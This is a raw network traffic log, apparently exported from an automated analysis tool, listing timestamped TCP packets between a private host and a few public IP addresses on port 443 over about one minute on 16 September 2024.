                    Sep 16, 2024 21:21:49.841880083 CEST49751443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:21:50.003736019 CEST49751443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:21:50.187146902 CEST49752443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:50.187256098 CEST44349752188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:50.187359095 CEST49752443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:50.187658072 CEST49752443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:50.187699080 CEST44349752188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:51.561172009 CEST44349752188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:51.565399885 CEST49752443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:51.565429926 CEST44349752188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:51.773418903 CEST44349752188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:51.773559093 CEST44349752188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:51.773605108 CEST44349752188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:51.773626089 CEST49752443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:51.773647070 CEST44349752188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:51.773736000 CEST49752443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:51.774199009 CEST44349752188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:51.774539948 CEST44349752188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:51.774580002 CEST49752443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:51.774585962 CEST44349752188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:51.774755001 CEST44349752188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:51.774827003 CEST49752443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:51.775209904 CEST49752443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:55.307163954 CEST49754443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:21:55.307219028 CEST44349754104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:55.307356119 CEST49754443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:21:55.308093071 CEST49754443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:21:55.308123112 CEST44349754104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:55.782649040 CEST44349754104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:55.912364006 CEST49754443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:21:55.912431002 CEST44349754104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:56.025464058 CEST44349754104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:56.025722027 CEST44349754104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:56.026093006 CEST44349754104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:56.026114941 CEST44349754104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:56.026175976 CEST49754443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:21:56.026230097 CEST44349754104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:56.026261091 CEST49754443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:21:56.026557922 CEST44349754104.20.4.235192.168.2.6
                    Sep 16, 2024 21:21:56.026665926 CEST49754443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:21:56.082320929 CEST49754443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:21:56.499504089 CEST49755443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:56.499603987 CEST44349755188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:56.499697924 CEST49755443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:56.500227928 CEST49755443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:56.500266075 CEST44349755188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:57.064827919 CEST44349755188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:57.067473888 CEST49755443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:57.067537069 CEST44349755188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:57.320100069 CEST44349755188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:57.320322037 CEST44349755188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:57.320344925 CEST44349755188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:57.320384026 CEST49755443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:57.320410967 CEST44349755188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:57.320456982 CEST49755443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:57.320765018 CEST44349755188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:57.321381092 CEST44349755188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:57.321407080 CEST44349755188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:57.321499109 CEST44349755188.114.97.3192.168.2.6
                    Sep 16, 2024 21:21:57.321558952 CEST49755443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:21:57.322010040 CEST49755443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:22:01.616805077 CEST49756443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:22:01.616853952 CEST44349756104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:01.617079020 CEST49756443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:22:01.617491007 CEST49756443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:22:01.617506027 CEST44349756104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:02.453627110 CEST44349756104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:02.455836058 CEST49756443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:22:02.455848932 CEST44349756104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:02.821283102 CEST44349756104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:02.821543932 CEST44349756104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:02.821579933 CEST44349756104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:02.821583986 CEST49756443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:22:02.821594000 CEST44349756104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:02.821645021 CEST49756443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:22:02.821655035 CEST44349756104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:02.821688890 CEST44349756104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:02.821723938 CEST49756443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:22:02.822186947 CEST49756443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:22:02.844949961 CEST49757443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:22:02.845045090 CEST44349757188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:02.845123053 CEST49757443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:22:02.845406055 CEST49757443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:22:02.845443964 CEST44349757188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:03.509403944 CEST44349757188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:03.511293888 CEST49757443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:22:03.511373043 CEST44349757188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:03.764926910 CEST44349757188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:03.765038967 CEST44349757188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:03.765070915 CEST44349757188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:03.765172005 CEST49757443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:22:03.765234947 CEST44349757188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:03.765373945 CEST49757443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:22:03.765749931 CEST44349757188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:03.766096115 CEST44349757188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:03.766129017 CEST44349757188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:03.766154051 CEST49757443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:22:03.766172886 CEST44349757188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:03.766263008 CEST44349757188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:03.766323090 CEST49757443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:22:03.766597986 CEST49757443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:22:07.869920015 CEST49758443192.168.2.6104.21.76.57
                    Sep 16, 2024 21:22:07.869968891 CEST44349758104.21.76.57192.168.2.6
                    Sep 16, 2024 21:22:07.870032072 CEST49758443192.168.2.6104.21.76.57
                    Sep 16, 2024 21:22:07.870352983 CEST49758443192.168.2.6104.21.76.57
                    Sep 16, 2024 21:22:07.870371103 CEST44349758104.21.76.57192.168.2.6
                    Sep 16, 2024 21:22:08.335632086 CEST44349758104.21.76.57192.168.2.6
                    Sep 16, 2024 21:22:08.337333918 CEST49758443192.168.2.6104.21.76.57
                    Sep 16, 2024 21:22:08.337368965 CEST44349758104.21.76.57192.168.2.6
                    Sep 16, 2024 21:22:08.487924099 CEST44349758104.21.76.57192.168.2.6
                    Sep 16, 2024 21:22:08.488306999 CEST44349758104.21.76.57192.168.2.6
                    Sep 16, 2024 21:22:08.488399029 CEST44349758104.21.76.57192.168.2.6
                    Sep 16, 2024 21:22:08.488415956 CEST49758443192.168.2.6104.21.76.57
                    Sep 16, 2024 21:22:08.488485098 CEST44349758104.21.76.57192.168.2.6
                    Sep 16, 2024 21:22:08.488639116 CEST49758443192.168.2.6104.21.76.57
                    Sep 16, 2024 21:22:08.488657951 CEST44349758104.21.76.57192.168.2.6
                    Sep 16, 2024 21:22:08.489140987 CEST44349758104.21.76.57192.168.2.6
                    Sep 16, 2024 21:22:08.489200115 CEST49758443192.168.2.6104.21.76.57
                    Sep 16, 2024 21:22:08.489214897 CEST44349758104.21.76.57192.168.2.6
                    Sep 16, 2024 21:22:08.489885092 CEST44349758104.21.76.57192.168.2.6
                    Sep 16, 2024 21:22:08.489948034 CEST49758443192.168.2.6104.21.76.57
                    Sep 16, 2024 21:22:08.489962101 CEST44349758104.21.76.57192.168.2.6
                    Sep 16, 2024 21:22:08.490712881 CEST44349758104.21.76.57192.168.2.6
                    Sep 16, 2024 21:22:08.490828991 CEST49758443192.168.2.6104.21.76.57
                    Sep 16, 2024 21:22:08.490843058 CEST44349758104.21.76.57192.168.2.6
                    Sep 16, 2024 21:22:08.575417995 CEST44349758104.21.76.57192.168.2.6
                    Sep 16, 2024 21:22:08.575505018 CEST49758443192.168.2.6104.21.76.57
                    Sep 16, 2024 21:22:08.575530052 CEST44349758104.21.76.57192.168.2.6
                    Sep 16, 2024 21:22:08.575617075 CEST44349758104.21.76.57192.168.2.6
                    Sep 16, 2024 21:22:08.575690031 CEST49758443192.168.2.6104.21.76.57
                    Sep 16, 2024 21:22:08.575704098 CEST44349758104.21.76.57192.168.2.6
                    Sep 16, 2024 21:22:08.575844049 CEST44349758104.21.76.57192.168.2.6
                    Sep 16, 2024 21:22:08.575915098 CEST49758443192.168.2.6104.21.76.57
                    Sep 16, 2024 21:22:08.576242924 CEST49758443192.168.2.6104.21.76.57
                    Sep 16, 2024 21:22:08.679932117 CEST49759443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:22:08.679971933 CEST44349759104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:08.680119038 CEST49759443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:22:08.680402040 CEST49759443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:22:08.680416107 CEST44349759104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:09.143805981 CEST44349759104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:09.145387888 CEST49759443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:22:09.145407915 CEST44349759104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:09.599267006 CEST44349759104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:09.599432945 CEST44349759104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:09.599478960 CEST49759443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:22:09.599494934 CEST44349759104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:09.599749088 CEST44349759104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:09.599798918 CEST49759443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:22:09.599807024 CEST44349759104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:09.599946022 CEST44349759104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:09.599993944 CEST49759443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:22:09.600596905 CEST49759443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:22:09.624512911 CEST49760443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:22:09.624561071 CEST44349760188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:09.624636889 CEST49760443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:22:09.624928951 CEST49760443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:22:09.624944925 CEST44349760188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:10.284509897 CEST44349760188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:10.339685917 CEST49760443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:22:10.667819977 CEST49760443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:22:10.667865038 CEST44349760188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:11.128739119 CEST44349760188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:11.128902912 CEST44349760188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:11.128993034 CEST44349760188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:11.129132986 CEST44349760188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:11.129200935 CEST44349760188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:11.129884958 CEST44349760188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:11.129930973 CEST49760443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:22:11.129957914 CEST44349760188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:11.130183935 CEST44349760188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:11.131510019 CEST49760443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:22:11.257992029 CEST49760443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:22:14.743439913 CEST49761443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:22:14.743510962 CEST44349761104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:14.743623972 CEST49761443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:22:14.743858099 CEST49761443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:22:14.743892908 CEST44349761104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:15.426311970 CEST44349761104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:15.429575920 CEST49761443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:22:15.429609060 CEST44349761104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:15.557786942 CEST44349761104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:15.557899952 CEST44349761104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:15.557981968 CEST49761443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:22:15.557987928 CEST44349761104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:15.558016062 CEST44349761104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:15.558068037 CEST49761443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:22:15.558103085 CEST44349761104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:15.558321953 CEST44349761104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:15.558382034 CEST49761443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:22:15.567405939 CEST49761443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:22:16.306135893 CEST49762443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:22:16.306231976 CEST44349762188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:16.306355953 CEST49762443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:22:16.306632042 CEST49762443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:22:16.306688070 CEST44349762188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:16.843338966 CEST44349762188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:16.845276117 CEST49762443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:22:16.845360994 CEST44349762188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:17.089562893 CEST44349762188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:17.089700937 CEST44349762188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:17.089797974 CEST49762443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:22:17.089838028 CEST44349762188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:17.089868069 CEST44349762188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:17.090689898 CEST44349762188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:17.090759993 CEST49762443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:22:17.090764046 CEST44349762188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:17.090787888 CEST44349762188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:17.090816021 CEST49762443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:22:17.091051102 CEST44349762188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:17.091120958 CEST49762443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:22:17.091434956 CEST49762443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:22:21.445631027 CEST49763443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:22:21.445677996 CEST44349763104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:21.445734978 CEST49763443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:22:21.446264029 CEST49763443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:22:21.446271896 CEST44349763104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:21.928368092 CEST44349763104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:21.955859900 CEST49763443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:22:21.955892086 CEST44349763104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:22.074008942 CEST44349763104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:22.074147940 CEST44349763104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:22.074194908 CEST49763443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:22:22.074207067 CEST44349763104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:22.074289083 CEST44349763104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:22.074332952 CEST49763443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:22:22.074338913 CEST44349763104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:22.074472904 CEST44349763104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:22.074521065 CEST49763443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:22:22.083359957 CEST49763443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:22:22.279218912 CEST49764443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:22:22.279308081 CEST44349764188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:22.279407978 CEST49764443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:22:22.279606104 CEST49764443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:22:22.279635906 CEST44349764188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:22.968313932 CEST44349764188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:22.969933987 CEST49764443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:22:22.969955921 CEST44349764188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:23.213413954 CEST44349764188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:23.213551044 CEST44349764188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:23.213644028 CEST44349764188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:23.213723898 CEST49764443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:22:23.213737965 CEST44349764188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:23.213767052 CEST44349764188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:23.213797092 CEST49764443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:22:23.214466095 CEST44349764188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:23.214550018 CEST44349764188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:23.214581013 CEST49764443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:22:23.214595079 CEST44349764188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:23.214649916 CEST49764443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:22:23.214658022 CEST44349764188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:23.214736938 CEST44349764188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:23.214857101 CEST49764443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:22:23.215117931 CEST49764443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:22:27.467482090 CEST49765443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:22:27.467547894 CEST44349765104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:27.467621088 CEST49765443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:22:27.479892969 CEST49765443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:22:27.479948044 CEST44349765104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:27.976929903 CEST44349765104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:27.995692015 CEST49765443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:22:27.995794058 CEST44349765104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:28.129288912 CEST44349765104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:28.129425049 CEST44349765104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:28.129488945 CEST49765443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:22:28.129517078 CEST44349765104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:28.129545927 CEST44349765104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:28.129594088 CEST49765443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:22:28.129630089 CEST44349765104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:28.130019903 CEST44349765104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:28.130069971 CEST49765443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:22:28.139372110 CEST49765443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:22:28.253745079 CEST49766443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:22:28.253819942 CEST44349766188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:28.253885984 CEST49766443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:22:28.254139900 CEST49766443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:22:28.254158974 CEST44349766188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:28.775269032 CEST44349766188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:28.777672052 CEST49766443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:22:28.777704954 CEST44349766188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:29.020729065 CEST44349766188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:29.020833015 CEST44349766188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:29.021137953 CEST44349766188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:29.021176100 CEST49766443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:22:29.021183014 CEST44349766188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:29.021214008 CEST44349766188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:29.021266937 CEST49766443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:22:29.021277905 CEST44349766188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:29.021347046 CEST49766443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:22:29.021913052 CEST44349766188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:29.022049904 CEST44349766188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:29.022140980 CEST49766443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:22:29.023664951 CEST49766443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:22:33.366889954 CEST49767443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:22:33.366935015 CEST44349767104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:33.367007971 CEST49767443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:22:33.367352962 CEST49767443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:22:33.367367983 CEST44349767104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:34.156716108 CEST44349767104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:34.159106016 CEST49767443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:22:34.159135103 CEST44349767104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:34.303615093 CEST44349767104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:34.303683996 CEST44349767104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:34.303723097 CEST44349767104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:34.303761005 CEST44349767104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:34.303792000 CEST49767443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:22:34.303812027 CEST44349767104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:34.303847075 CEST49767443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:22:34.303881884 CEST44349767104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:34.303957939 CEST49767443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:22:34.304397106 CEST49767443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:22:34.320986986 CEST49768443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:22:34.321062088 CEST44349768188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:34.321240902 CEST49768443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:22:34.321453094 CEST49768443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:22:34.321465015 CEST44349768188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:34.816567898 CEST44349768188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:34.818476915 CEST49768443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:22:34.818509102 CEST44349768188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:35.052203894 CEST44349768188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:35.052330017 CEST44349768188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:35.052408934 CEST49768443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:22:35.052419901 CEST44349768188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:35.052458048 CEST44349768188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:35.052618027 CEST49768443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:22:35.052627087 CEST44349768188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:35.053227901 CEST44349768188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:35.053313017 CEST44349768188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:35.053423882 CEST49768443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:22:35.053436041 CEST44349768188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:35.053504944 CEST44349768188.114.97.3192.168.2.6
                    Sep 16, 2024 21:22:35.053540945 CEST49768443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:22:35.053827047 CEST49768443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:22:35.053891897 CEST49768443192.168.2.6188.114.97.3
                    Sep 16, 2024 21:22:39.445425987 CEST49769443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:22:39.445547104 CEST44349769104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:39.445627928 CEST49769443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:22:39.446044922 CEST49769443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:22:39.446082115 CEST44349769104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:39.925879955 CEST44349769104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:39.927722931 CEST49769443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:22:39.927767038 CEST44349769104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:40.084034920 CEST44349769104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:40.084161997 CEST44349769104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:40.084249020 CEST44349769104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:40.084341049 CEST44349769104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:40.084346056 CEST49769443192.168.2.6104.20.4.235
                    Sep 16, 2024 21:22:40.084415913 CEST44349769104.20.4.235192.168.2.6
                    Sep 16, 2024 21:22:40.084450960 CEST49769443192.168.2.6104.20.4.235
